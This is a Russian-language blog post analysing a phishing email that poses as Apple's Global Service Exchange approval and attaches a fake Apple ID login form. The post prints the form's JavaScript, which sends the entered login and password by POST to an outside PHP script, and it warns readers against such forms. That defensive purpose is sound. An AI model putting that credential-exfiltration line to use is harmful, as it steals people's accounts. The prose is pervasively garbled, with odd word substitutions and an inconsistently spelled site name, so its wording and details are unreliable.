Внимание! Сегодня нам на почту пришло странное письмо… от Apple

На ваш почтовый ящик довольно часто приходит спам? Он не редкость различный: рекламный, прося о помощи каким-то неизвестным африканским товарищам, попавшим в непростую денежную обстановку, рассылка из сервисов… Сейчас на почтовый адрес отечественной редакции пришло любопытное письмо… от Apple.

Вернее, так возможно было поразмыслить на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же ясно, что это фейковый почтовый адрес, цель которого — получение логина и пароля от Apple ID.

Само письмо выглядит следующим образом:

Из маленького сообщения мы выяснили, что отечественная заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что необходимо для активации — загрузить прилагающийся архив и ввести эти Apple ID в прилагающейся форме.

Самое весьма интересно в том, что никакой заявки на участие в GSX ни один из участников отечественной редакции не подавал.

GSX — это специальный инструмент, что Apple выдает ограниченному кругу экспертов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе употребляется iOS Diagnostics Apple, или магазин-посредник, что разрешает связать с устройством клиента для получения нужной информацим.

Полученное письмо вправду выглядит правдоподобно: коротко, по делу, с подтверждением заявки и основной — адрес отправителя. Очень реалистичный адрес [email protected] — в том же домене, что и Apple и без дополнительных приписок.

В архива имеется единственный файл в формате *.shtml. Открываем — простая форма, которая всецело сходится с оригиналом от Apple:

Очевидно, вводить Apple ID в странное окно мы не стали.

В прикрепленном файле был обнаружен следующий код:

xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true); xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′); xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);

Он передает пароль и логин на сайт nubetelstore.com

В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы скажем им об данной проблеме.

Хозяева сайта вероятнее не знают о том, что он употребляется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого продемонстрировал, что он вероятно был написан людьми, каковые не думали о безопасности и делали по принципу: «Дабы трудилось».

Вполне возможно nublestore.com был взломан и употребляется мошенниками без ведома его обладателей.

Как выяснилось, полученное нами письмо — распространенный вариант фишинга, что от имени [email protected] действует с февраля месяца. Достаточно ввести эти собственного аккаунта, как вы тут же попадаетесь на крючок преступника и всецело теряете контроль на своим аккаунтом.

Будьте внимательны и ни при каких обстоятельствах не вводите эти собственной учетной записи в странные формы. Фишинг — вещь узкая и адрес [email protected] смотрелся очень правдоподобно. Если бы кто-то из отечественной громадной команды сайта вправду подавал заявку на участие в Global Service Exchange, подвоха мы сходу имели возможность бы и не подметить.

Комментарии и уведомления в настоящее время закрыты..

Комментарии закрыты.